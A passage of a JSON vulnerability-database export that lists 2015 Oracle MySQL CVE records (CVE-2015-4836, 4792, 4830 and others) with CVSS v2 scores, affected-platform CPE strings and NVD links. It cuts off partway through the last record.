"cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", 
"cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : SP.", "edition": 6, "cvss3": {}, "published": "2015-10-21T23:59:00", "title": "CVE-2015-4836", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.8, "vectorString": "AV:N/AC:M/Au:M/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "MULTIPLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4836"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:oracle:linux:7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4836", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4836", "cvss": {"score": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition, a different vulnerability than CVE-2015-4802.", "edition": 6, "cvss3": {}, "published": "2015-10-21T21:59:00", "title": "CVE-2015-4792", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.2, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", 
"baseScore": 1.7, "vectorString": "AV:N/AC:H/Au:M/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "MULTIPLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4792"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:oracle:linux:7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4792", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4792", "cvss": {"score": 1.7, "vector": "AV:N/AC:H/Au:M/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", 
"cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server : Security : Privileges.", "edition": 5, "cvss3": {}, "published": "2015-10-21T21:59:00", "title": "CVE-2015-4830", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4830"], "modified": "2019-02-11T18:45:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_desktop:7.0", 
"cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4830", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4830", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect confidentiality via unknown vectors related to Server : Types.", "edition": 5, "cvss3": {}, "published": "2015-10-21T21:59:00", "title": "CVE-2015-4826", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4826"], "modified": "2019-02-11T18:48:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4826", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4826", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", 
"cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition, a different vulnerability than CVE-2015-4792.", "edition": 6, "cvss3": {}, "published": "2015-10-21T21:59:00", "title": "CVE-2015-4802", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4802"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", 
"cpe:/o:oracle:linux:7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4802", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4802", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier, when running on Windows, allows remote authenticated users to affect availability via unknown vectors related to Server : Query Cache.\n<a href=\"http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\" rel=\"nofollow\">\"This issue impacts the Windows platform only.\"</a>", "edition": 5, "cvss3": {}, 
"published": "2015-10-21T21:59:00", "title": "CVE-2015-4807", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4807"], "modified": "2019-02-11T19:19:00", "cpe": ["cpe:/a:oracle:mysql:5.6.26", "cpe:/o:opensuse:leap:42.1", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4807", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4807", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via vectors related to DML, a different vulnerability than CVE-2015-4913.", "edition": 6, "cvss3": {}, "published": "2015-10-21T23:59:00", "title": "CVE-2015-4858", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4858"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:oracle:linux:7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4858", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4858", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", 
"cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Parser.", "edition": 6, "cvss3": {}, "published": "2015-10-21T23:59:00", "title": "CVE-2015-4870", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4870"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:oracle:linux:7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", 
"cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4870", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4870", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to Server : DDL.", "edition": 6, "cvss3": {}, "published": "2015-10-21T21:59:00", "title": "CVE-2015-4815", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 